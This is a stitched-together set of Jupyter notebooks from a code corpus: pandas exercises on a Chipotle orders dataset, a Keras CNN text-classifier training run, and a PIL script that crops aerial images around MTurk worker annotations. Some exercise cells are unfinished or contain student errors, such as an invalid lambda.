"# __How to Save NEW data to our shared folder__\n#### _Important Note_: when saving new data always name the file with a clear name followed by '-YourName'. And similar to how you opened data, you MUST enter the full path as shown in the cell directly above as the variable mypath and include an necessary subdirectories. I will then resave the new file within my google drive that has unlimited storage, whereas yours will not.\n#### FOR EXAMPLE: Using data_3's filename, you would save it as \"/content/gdrive/My Drive/EscapeEarthData/bls_powers-Danielle.npy\". ",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e707000cb62c9d4d8d7efa6aeaeffe85044dfc64 | 50,370 | ipynb | Jupyter Notebook | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | anjanapoudyal/pandas_exercises | 5bb4dcd544a97f7a1335c7059b8f8cd2e1a300cc | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | anjanapoudyal/pandas_exercises | 5bb4dcd544a97f7a1335c7059b8f8cd2e1a300cc | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | anjanapoudyal/pandas_exercises | 5bb4dcd544a97f7a1335c7059b8f8cd2e1a300cc | [
"BSD-3-Clause"
] | null | null | null | 37.228381 | 733 | 0.378757 | [
[
[
"# Ex2 - Getting and Knowing your Data",
"_____no_output_____"
],
[
"This time we are going to pull data directly from the internet.\nSpecial thanks to: https://github.com/justmarkham for sharing the dataset and materials.\n\n### Step 1. Import the necessary libraries",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\n",
"_____no_output_____"
]
],
[
[
"### Step 2. Import the dataset from this [address](https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv). ",
"_____no_output_____"
],
[
"### Step 3. Assign it to a variable called chipo.",
"_____no_output_____"
]
],
[
[
"chipo= pd.read_csv('https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv',\"\\t\")",
"/usr/local/lib/python3.7/dist-packages/IPython/core/interactiveshell.py:2882: FutureWarning: In a future version of pandas all arguments of read_csv except for the argument 'filepath_or_buffer' will be keyword-only\n exec(code_obj, self.user_global_ns, self.user_ns)\n"
]
],
[
[
"### Step 4. See the first 10 entries",
"_____no_output_____"
]
],
[
[
"chipo.head(10)",
"_____no_output_____"
]
],
[
[
"### Step 5. What is the number of observations in the dataset?",
"_____no_output_____"
]
],
[
[
"chipo.info()\n#chipo.count()\n\n\n\n\n",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 4622 entries, 0 to 4621\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 order_id 4622 non-null int64 \n 1 quantity 4622 non-null int64 \n 2 item_name 4622 non-null object\n 3 choice_description 3376 non-null object\n 4 item_price 4622 non-null object\ndtypes: int64(2), object(3)\nmemory usage: 180.7+ KB\n"
],
[
"# Solution 2\nchipo.shape\n",
"_____no_output_____"
]
],
[
[
"### Step 6. What is the number of columns in the dataset?",
"_____no_output_____"
]
],
[
[
"chipo.shape\n#len(chipo.columns)",
"_____no_output_____"
]
],
[
[
"### Step 7. Print the name of all the columns.",
"_____no_output_____"
]
],
[
[
"chipo.columns",
"_____no_output_____"
]
],
[
[
"### Step 8. How is the dataset indexed?",
"_____no_output_____"
]
],
[
[
"chipo.index",
"_____no_output_____"
]
],
[
[
"### Step 9. Which was the most-ordered item? ",
"_____no_output_____"
]
],
[
[
"#chipo['item_name'].value_counts().head(1)\nitem_quants=chipo.groupby([\"item_name\"]).agg({\"quantity\":'sum'})\nitem_quants.sort_values(\"quantity\",ascending=False)[:1]",
"_____no_output_____"
]
],
[
[
"### Step 10. For the most-ordered item, how many items were ordered?",
"_____no_output_____"
]
],
[
[
"chipo.groupby(\"item_name\").sum().sort_values('quantity',ascending=False).head(1)\n",
"_____no_output_____"
]
],
[
[
"### Step 11. What was the most ordered item in the choice_description column?",
"_____no_output_____"
]
],
[
[
"#chipo['choice_description'].value_counts().head(1)\nitem_quants=chipo.groupby([\"choice_description\"]).agg({\"quantity\":'sum'})\nitem_quants.sort_values(\"quantity\",ascending=False)[:5]",
"_____no_output_____"
]
],
[
[
"### Step 12. How many items were orderd in total?",
"_____no_output_____"
]
],
[
[
"chipo.quantity.count()\n",
"_____no_output_____"
]
],
[
[
"### Step 13. Turn the item price into a float",
"_____no_output_____"
]
],
[
[
"chipo['item_price']= chipo.item_price.str.slice(1).astype(float)\nchipo.info",
"_____no_output_____"
]
],
[
[
"#### Step 13.a. Check the item price type",
"_____no_output_____"
]
],
[
[
"chipo['item_price'].dtypes",
"_____no_output_____"
]
],
[
[
"#### Step 13.b. Create a lambda function and change the type of item price",
"_____no_output_____"
]
],
[
[
"chipo[\"item_price\"].apply(lambda x: [int(x) if x is type(float)])\n#lambda x: int(x) if isinstance(x, float) else x\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"#### Step 13.c. Check the item price type",
"_____no_output_____"
]
],
[
[
"chipo['item_price'].dtypes",
"_____no_output_____"
]
],
[
[
"### Step 14. How much was the revenue for the period in the dataset?",
"_____no_output_____"
]
],
[
[
"\n",
"_____no_output_____"
]
],
[
[
"### Step 15. How many orders were made in the period?",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"### Step 16. What is the average revenue amount per order?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n\n",
"_____no_output_____"
],
[
"# Solution 2\n\n",
"_____no_output_____"
]
],
[
[
"### Step 17. How many different items are sold?",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70701ee78015b09c1e778812a187e4a7ded90c1 | 16,663 | ipynb | Jupyter Notebook | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | waldemarmeier/pandas_exercises | a926b26f1915672821439e1945fd08647ecd1ae8 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | waldemarmeier/pandas_exercises | a926b26f1915672821439e1945fd08647ecd1ae8 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | waldemarmeier/pandas_exercises | a926b26f1915672821439e1945fd08647ecd1ae8 | [
"BSD-3-Clause"
] | null | null | null | 22.888736 | 135 | 0.413791 | [
[
[
"# Ex2 - Getting and Knowing your Data",
"_____no_output_____"
],
[
"This time we are going to pull data directly from the internet.\nSpecial thanks to: https://github.com/justmarkham for sharing the dataset and materials.\n\n### Step 1. Import the necessary libraries",
"_____no_output_____"
]
],
[
[
"import pandas as pd",
"_____no_output_____"
]
],
[
[
"### Step 2. Import the dataset from this [address](https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv). ",
"_____no_output_____"
],
[
"### Step 3. Assign it to a variable called chipo.",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv('https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv', sep = \"\\t\")",
"_____no_output_____"
]
],
[
[
"### Step 4. See the first 10 entries",
"_____no_output_____"
]
],
[
[
"data.head(10)",
"_____no_output_____"
]
],
[
[
"### Step 5. What is the number of observations in the dataset?",
"_____no_output_____"
]
],
[
[
"# Solution 1\ndata.shape[0]\n",
"_____no_output_____"
],
[
"# Solution 2\nlen(data)",
"_____no_output_____"
]
],
[
[
"### Step 6. What is the number of columns in the dataset?",
"_____no_output_____"
]
],
[
[
"data.shape[1]",
"_____no_output_____"
]
],
[
[
"### Step 7. Print the name of all the columns.",
"_____no_output_____"
]
],
[
[
"print(\", \".join(data.columns))",
"order_id, quantity, item_name, choice_description, item_price\n"
]
],
[
[
"### Step 8. How is the dataset indexed?",
"_____no_output_____"
]
],
[
[
"data.index",
"_____no_output_____"
]
],
[
[
"### Step 9. Which was the most-ordered item? ",
"_____no_output_____"
]
],
[
[
"data.groupby('item_name').sum().nlargest(1,'quantity')",
"_____no_output_____"
]
],
[
[
"### Step 10. For the most-ordered item, how many items were ordered?",
"_____no_output_____"
]
],
[
[
"data.nlargest(1,'quantity')['quantity']",
"_____no_output_____"
]
],
[
[
"### Step 11. What was the most ordered item in the choice_description column?",
"_____no_output_____"
]
],
[
[
"# slicing operator, so that the result is a series, hence keeps its index\ndata['choice_description'].value_counts()[0:1] ",
"_____no_output_____"
]
],
[
[
"### Step 12. How many items were orderd in total?",
"_____no_output_____"
]
],
[
[
"data['quantity'].sum()",
"_____no_output_____"
]
],
[
[
"### Step 13. Turn the item price into a float",
"_____no_output_____"
],
[
"#### Step 13.a. Check the item price type",
"_____no_output_____"
]
],
[
[
"data['item_price'].dtype",
"_____no_output_____"
]
],
[
[
"#### Step 13.b. Create a lambda function and change the type of item price",
"_____no_output_____"
]
],
[
[
"data['item_price'] = data['item_price'].apply(lambda item_price: float(item_price.strip(\"$\")))",
"_____no_output_____"
]
],
[
[
"#### Step 13.c. Check the item price type",
"_____no_output_____"
]
],
[
[
"data.dtypes",
"_____no_output_____"
]
],
[
[
"### Step 14. How much was the revenue for the period in the dataset?",
"_____no_output_____"
]
],
[
[
"(data['item_price'] * data['quantity']).sum()",
"_____no_output_____"
]
],
[
[
"### Step 15. How many orders were made in the period?",
"_____no_output_____"
]
],
[
[
"data['order_id'].nunique()",
"_____no_output_____"
]
],
[
[
"### Step 16. What is the average revenue amount per order?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n(data['item_price'] * data['quantity']).sum() / data['order_id'].nunique()",
"_____no_output_____"
],
[
"# Solution 2\ndata.groupby('order_id').apply(lambda _order : (_order['item_price'] * _order['quantity']).sum()).mean()",
"_____no_output_____"
]
],
[
[
"### Step 17. How many different items are sold?",
"_____no_output_____"
]
],
[
[
"data['item_name'].nunique()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e70710be5fde4dfa449b8e2772bec087b5f5f2f4 | 99,886 | ipynb | Jupyter Notebook | Sentence_Classification_Self/Sir_Aurobindo/Main_Implementation - Sir Aurobindo.ipynb | mihirsam/Information-Extraction-using-CNN | 7e939b8f37c1e06a1639f4a15d51df817e835bd2 | [
"MIT"
] | 7 | 2020-07-20T06:38:29.000Z | 2022-01-25T07:51:08.000Z | Sentence_Classification_Self/Sir_Aurobindo/Main_Implementation - Sir Aurobindo.ipynb | mihirsam/Information-Extraction-using-CNN | 7e939b8f37c1e06a1639f4a15d51df817e835bd2 | [
"MIT"
] | null | null | null | Sentence_Classification_Self/Sir_Aurobindo/Main_Implementation - Sir Aurobindo.ipynb | mihirsam/Information-Extraction-using-CNN | 7e939b8f37c1e06a1639f4a15d51df817e835bd2 | [
"MIT"
] | 4 | 2019-10-09T09:44:53.000Z | 2020-12-07T14:31:21.000Z | 244.818627 | 42,372 | 0.90317 | [
[
[
"from CNN import tCNN",
"_____no_output_____"
]
],
[
[
"## Getting Data ",
"_____no_output_____"
]
],
[
[
"import pickle\nwith open('Data_sirAurobindo.pkl', 'rb') as f:\n Final = pickle.load(f)\n \nX = Final[0]\nY = Final[1]",
"_____no_output_____"
]
],
[
[
"## Random Shuffle",
"_____no_output_____"
]
],
[
[
"import random\n\nXY = list(zip(X, Y))\nrandom.shuffle(XY)\n\nX, Y = zip(*XY)",
"_____no_output_____"
],
[
"len(X)",
"_____no_output_____"
],
[
"tCNN()\n\n\nfrom keras.utils import plot_model\nfrom IPython.display import Image\nfrom keras.models import load_model\n\nmodel = load_model('CNN_model_init.h5')\nplot_model(model, to_file='CNN_arch.png')\nImage(filename='./CNN_arch.png')",
"__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_2 (InputLayer) (None, 10, 10, 1) 0 \n__________________________________________________________________________________________________\nzero_padding2d_4 (ZeroPadding2D (None, 14, 14, 1) 0 input_2[0][0] \n__________________________________________________________________________________________________\nzero_padding2d_5 (ZeroPadding2D (None, 14, 14, 1) 0 input_2[0][0] \n__________________________________________________________________________________________________\nzero_padding2d_6 (ZeroPadding2D (None, 14, 14, 1) 0 input_2[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 12, 12, 64) 640 zero_padding2d_4[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 12, 12, 64) 640 zero_padding2d_5[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 12, 12, 64) 640 zero_padding2d_6[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_7 (MaxPooling2D) (None, 11, 11, 64) 0 conv2d_4[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_8 (MaxPooling2D) (None, 11, 11, 64) 0 conv2d_5[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_9 (MaxPooling2D) (None, 11, 11, 64) 0 conv2d_6[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_10 (MaxPooling2D) (None, 9, 9, 64) 0 max_pooling2d_7[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_11 (MaxPooling2D) (None, 9, 9, 64) 0 max_pooling2d_8[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_12 (MaxPooling2D) (None, 9, 9, 64) 0 max_pooling2d_9[0][0] \n__________________________________________________________________________________________________\nconcatenate_2 (Concatenate) (None, 27, 9, 64) 0 max_pooling2d_10[0][0] \n max_pooling2d_11[0][0] \n max_pooling2d_12[0][0] \n__________________________________________________________________________________________________\nflatten_2 (Flatten) (None, 15552) 0 concatenate_2[0][0] \n__________________________________________________________________________________________________\ndense_2 (Dense) (None, 6) 93318 flatten_2[0][0] \n==================================================================================================\nTotal params: 95,238\nTrainable params: 95,238\nNon-trainable params: 0\n__________________________________________________________________________________________________\nModel Saved!\n"
]
],
[
[
"## Reshaping Array",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\nX = np.asarray(X)\nY = np.asarray(Y)\n\nX = X.reshape(X.shape[0], X.shape[1], X.shape[2], 1)\nY = Y.reshape(Y.shape[0], 1)\n\nprint(f\"X shape : {X.shape}\\nY shape : {Y.shape}\")",
"X shape : (141, 10, 10, 1)\nY shape : (141, 1)\n"
],
[
"x_train = X[0:100]\ny_train = Y[0:100]\n\nx_test = X[100:]\ny_test = Y[100:]",
"_____no_output_____"
]
],
[
[
"## Training Model",
"_____no_output_____"
]
],
[
[
"# callback function\nimport keras\nimport matplotlib.pyplot as plt\n\nclass myCallback(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs={}):\n if(logs.get('acc')>0.90):\n print(\"\\nReached 90% accuracy so cancelling training!\")\n self.model.stop_training = True\n \ncallback = myCallback()\n\nhistory = model.fit(x_train, y_train,\n epochs=1000,\n verbose=1,\n validation_data=(x_test, y_test),\n callbacks=[callback])\n\ntry:\n model.save('CNN_model_sirAurobindo.h5')\n print(\"Model Saved!\")\nexcept:\n print(\"Error in saving Model\")",
"Train on 100 samples, validate on 41 samples\nEpoch 1/1000\n100/100 [==============================] - 1s 15ms/step - loss: 5.4300 - acc: 0.2200 - val_loss: 3.6067 - val_acc: 0.3659\nEpoch 2/1000\n100/100 [==============================] - 0s 1ms/step - loss: 4.1958 - acc: 0.1700 - val_loss: 3.3285 - val_acc: 0.2927\nEpoch 3/1000\n100/100 [==============================] - 0s 1ms/step - loss: 3.3507 - acc: 0.2100 - val_loss: 2.4355 - val_acc: 0.4878\nEpoch 4/1000\n100/100 [==============================] - 0s 1ms/step - loss: 2.3192 - acc: 0.3100 - val_loss: 2.1371 - val_acc: 0.2195\nEpoch 5/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.9823 - acc: 0.2700 - val_loss: 2.0280 - val_acc: 0.3659\nEpoch 6/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.8946 - acc: 0.4300 - val_loss: 1.3595 - val_acc: 0.6829\nEpoch 7/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.4568 - acc: 0.4800 - val_loss: 1.3844 - val_acc: 0.4878\nEpoch 8/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.4409 - acc: 0.5500 - val_loss: 1.5604 - val_acc: 0.3659\nEpoch 9/1000\n100/100 [==============================] - 0s 975us/step - loss: 1.0690 - acc: 0.5500 - val_loss: 0.9641 - val_acc: 0.7317\nEpoch 10/1000\n100/100 [==============================] - 0s 1ms/step - loss: 1.0512 - acc: 0.6900 - val_loss: 0.7967 - val_acc: 0.8049\nEpoch 11/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.6914 - acc: 0.7700 - val_loss: 0.8931 - val_acc: 0.6341\nEpoch 12/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.6997 - acc: 0.7800 - val_loss: 0.4875 - val_acc: 0.8293\nEpoch 13/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.3976 - acc: 0.9000 - val_loss: 0.6189 - val_acc: 0.8293\nEpoch 14/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.5484 - acc: 0.8200 - val_loss: 0.3110 - val_acc: 0.9756\nEpoch 15/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.3573 - acc: 0.8800 - val_loss: 0.4086 - val_acc: 0.9512\nEpoch 16/1000\n100/100 [==============================] - 0s 1ms/step - loss: 0.3052 - acc: 0.9200 - val_loss: 0.4550 - val_acc: 0.8293\n\nReached 90% accuracy so cancelling training!\nModel Saved!\n"
]
],
[
[
"## Plotting Model Accuracy and Loss",
"_____no_output_____"
]
],
[
[
"# Plot training & validation accuracy values\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('Model accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.savefig('Model_accuracy_sirAurobindo.png', bbox_inches='tight')\nplt.show()\n\n# Plot training & validation loss values\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.savefig('Model_loss_sirAurobindo.png', bbox_inches='tight')",
"_____no_output_____"
],
[
"score = model.evaluate(x_test, y_test, verbose=0)\nscore",
"_____no_output_____"
],
[
"max(y_test)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
e7071a9266f06e1bff6915601044f281810878e6 | 20,086 | ipynb | Jupyter Notebook | src/notebooks/identification/plot_worker_annotations_from_main_images.ipynb | sushmaakoju/mturk-task-helper | 70416304f293e3907a1353ee52c440131aa8d7f1 | [
"MIT"
] | null | null | null | src/notebooks/identification/plot_worker_annotations_from_main_images.ipynb | sushmaakoju/mturk-task-helper | 70416304f293e3907a1353ee52c440131aa8d7f1 | [
"MIT"
] | null | null | null | src/notebooks/identification/plot_worker_annotations_from_main_images.ipynb | sushmaakoju/mturk-task-helper | 70416304f293e3907a1353ee52c440131aa8d7f1 | [
"MIT"
] | null | null | null | 31.237947 | 171 | 0.48835 | [
[
[
"### This script is for generating crop slices from main image rather than the images workers see and marked. \n### So output images show the worker annotations for object locations.",
"_____no_output_____"
]
],
[
[
"from PIL import Image,ImageDraw\nimport json\nimport numpy as np\nfrom matplotlib import pyplot as plt\n%matplotlib inline\nimport matplotlib.image as mpimg\nfrom math import floor\n\nfrom urllib.parse import urlparse\nimport urllib.request, json\nimport requests\nfrom io import BytesIO\nimport os\nImage.MAX_IMAGE_PIXELS = None\n\nimport boto3\nimport datetime\nimport json\nimport pandas as pd\nimport os\nfrom pathlib import Path",
"_____no_output_____"
]
],
[
[
"### Crop corner images that may location annotations towards corners or edges of main image.",
"_____no_output_____"
]
],
[
[
"def crop_corner_images(im:Image, xy:tuple, size:int, marker_color:tuple, image_file_path):\n x,y = xy\n crop = im.crop((x-size, y-size, x+size, y+size))\n assert crop.size, \"Invalid crop size.\"\n \n #print(crop.size)\n wc,hc = crop.size\n draw = ImageDraw.Draw(crop)\n w1,h1 = wc//2,hc//2\n \n draw.line((w1, 0)+ ( w1,hc), fill=marker_color,width=1)\n draw.line((0, h1)+ ( wc,h1), fill=marker_color, width=1)\n \n crop.convert('RGB').save(image_file_path)\n w,h = crop.size",
"_____no_output_____"
]
],
[
[
"### Mark vehicle location on the cropped slice",
"_____no_output_____"
]
],
[
[
"def mark_bounding_boxes(imarr:np.array, marker_color:tuple, image_file_path:os.path):\n img = Image.fromarray(imarr)#.resize((400,400), Image.LANCZOS)\n draw = ImageDraw.Draw(img)\n \n \n w,h = img.size\n\n p = ( int(floor(w/2))-50, int(floor(h/2))-50, int(floor(w/2))+50, int(floor(h/2))+50 )\n #print(p)\n\n \n w1,h1 = (w//2),(h//2)\n draw.line((w1, 0)+ ( w1,h), fill=marker_color, width=1)\n draw.line((0, h1)+ ( w,h1), fill=marker_color,width=1)\n \n img.convert('RGB').save(image_file_path)\n w,h = img.size",
"_____no_output_____"
]
],
[
[
"#### Correct the path of short answers from Selwyn dataset. Following lines of code needs to be updated in next cell .\n`filedir = os.path.join(os.path.join(r'C:\\Users\\exx\\Documents\\lab'), \"LINZ\",\"Final\",\"001_selwyn-0125m-urban-aerial-photos-2012-2013\")`",
"_____no_output_____"
]
],
[
[
"path = Path(os.getcwd())\n#get folder's storage\nfiledir = os.path.join(os.path.join(r'C:\\Users\\exx\\Documents\\lab'), \"LINZ\",\"Final\",\"001_selwyn-0125m-urban-aerial-photos-2012-2013\")\nmain_folders = [os.path.join(filedir,name) for name in os.listdir(filedir)]\nmain_folders",
"_____no_output_____"
]
],
[
[
"### Load the results path",
"_____no_output_____"
]
],
[
[
"rootpath = Path(os.getcwd())\nanswers_path = os.path.join(rootpath,\"batch100_HITs\",\"answers\", \"selwyn_answers_identification.csv\")\noutput_path = os.path.join(rootpath,\"batch100_HITs\",\"results\")\nresults_path = os.path.join(rootpath,\"batch100_HITs\",\"batch_results\")",
"_____no_output_____"
],
[
"files = os.listdir(results_path)\nfiles",
"_____no_output_____"
]
],
[
[
"### Load batch results to Dataframe",
"_____no_output_____"
]
],
[
[
"df = pd.read_csv(os.path.join(results_path,files[0]))",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"submitted_answers = df[['HITId','Answer.taskAnswers', 'WorkerId', 'WorkTimeInSeconds', 'LifetimeApprovalRate','Approve', 'Reject']]",
"_____no_output_____"
],
[
"submitted_answers['WorkTimeInSeconds'].max()",
"_____no_output_____"
],
[
"submitted_answers[['Answer.taskAnswers']]",
"_____no_output_____"
],
[
"workers = list(submitted_answers.groupby(['WorkerId']).groups.keys())\nlen(workers)",
"_____no_output_____"
]
],
[
[
"### Filter by worker id",
"_____no_output_____"
]
],
[
[
"submitted_answers.loc[submitted_answers['WorkerId'] == workers[0]] [['Answer.taskAnswers']]",
"_____no_output_____"
]
],
[
[
"### Get hit ids from results",
"_____no_output_____"
]
],
[
[
"hitids = list(submitted_answers.groupby(['HITId']).groups.keys())",
"_____no_output_____"
],
[
"len(hitids)",
"_____no_output_____"
]
],
[
[
"### Load the Ground truth with answers",
"_____no_output_____"
]
],
[
[
"answers = pd.read_csv(answers_path)",
"_____no_output_____"
],
[
"answers.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 20 entries, 0 to 19\nData columns (total 8 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 image_url 20 non-null object\n 1 url 20 non-null object\n 2 vehicle_types 20 non-null object\n 3 # of vehicles 20 non-null int64 \n 4 truck 2 non-null object\n 5 small 3 non-null object\n 6 specialized 1 non-null object\n 7 trailer_small 3 non-null object\ndtypes: int64(1), object(7)\nmemory usage: 1.4+ KB\n"
],
[
"#h,w,_ = imarray.shape\noverlap = 0.2\ntile_size = 300\nstride = int(tile_size * (1-overlap))\nwindow_width = tile_size\nmarker_color = (200,200,200,255)\n\ncropsize = 306\nsize = int(cropsize/2)",
"_____no_output_____"
]
],
[
[
"### For each worker, extract locations, transform to main image locations and crop the slices from main images (main images are actually larger than the slices.)\n#### Each of cropped slice is saved to image file path that has been sent as input to each of crop_corner_images or mark_bounding_boxes.\n#### if you want to save these images to specific path, please make sure to pass the correct path to both of these crop_corner_images or mark_bounding_boxes methods.",
"_____no_output_____"
]
],
[
[
"for worker in workers:\n worker_total_scores = 0\n total_worker_time = 0\n worker_answers = submitted_answers.loc[submitted_answers['WorkerId'] == worker]\n \n for index in worker_answers.index:\n feedback = \"\"\n \n ans = worker_answers['Answer.taskAnswers'][index]\n #print(ans)\n ans = json.loads(ans)#.replace(\"[\",\"\").replace(\"]\",\"\"))\n \n if not os.path.exists(os.path.join(output_path,\"from_main_image\",worker)):\n os.mkdir(os.path.join(output_path,\"from_main_image\",worker))\n outdirectory = os.path.join(output_path,\"from_main_image\",worker)\n \n for k,v in ans[0].items():\n if k != \"feedback\" :\n foldername, filename = k.split(\"/\")[6:]\n x,y = filename.split(\".\")[0].split(\"-\")[2:]\n x,y = int(x),int(y)\n mainfolder,subfolder = foldername.split(\"_\")\n main_image_name = foldername+\"_image.png\"\n row = answers.loc[answers['url'] == k].fillna('')\n #print(filename)\n \n if not os.path.exists(os.path.join(outdirectory,foldername)):\n os.mkdir(os.path.join(outdirectory,foldername))\n\n if len(v['keypoints']) != 0:\n im = Image.open(os.path.join(filedir,mainfolder, subfolder, main_image_name))\n #print(im.size,x,y )\n w,h = im.size\n imarray = np.asarray(im)\n #print(imarray.shape)\n pts = [[int(pt['x']),int(pt['y'])] for pt in v[\"keypoints\"]]\n for pt in pts:\n #print(pt, pt[1]+x, pt[0]+y)\n i,j = pt[1]+y, pt[0]+x\n imname = os.path.join(outdirectory,foldername, str(i)+\"-\"+str(j)+\".png\")\n\n crop_slice = np.s_[i-size:i+size, j-size:j+size]\n needs_padding = False\n for slic in crop_slice:\n if slic.start < 0 or (slic.stop-slic.start) < (2*size):\n #print(slic.start, slic.stop-slic.start, 2*size)\n needs_padding = True\n break\n #print(needs_padding, marker_color, x,y)\n if needs_padding:\n crop_corner_images(im, (j,i), size, marker_color,imname)\n else:\n imarr = imarray[crop_slice]\n h,w,_ = imarr.shape\n if h < cropsize or w < cropsize:\n crop_corner_images(im, (j,i), size, marker_color,imname)\n else:\n mark_bounding_boxes(imarray[crop_slice],marker_color, imname)\n\n ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
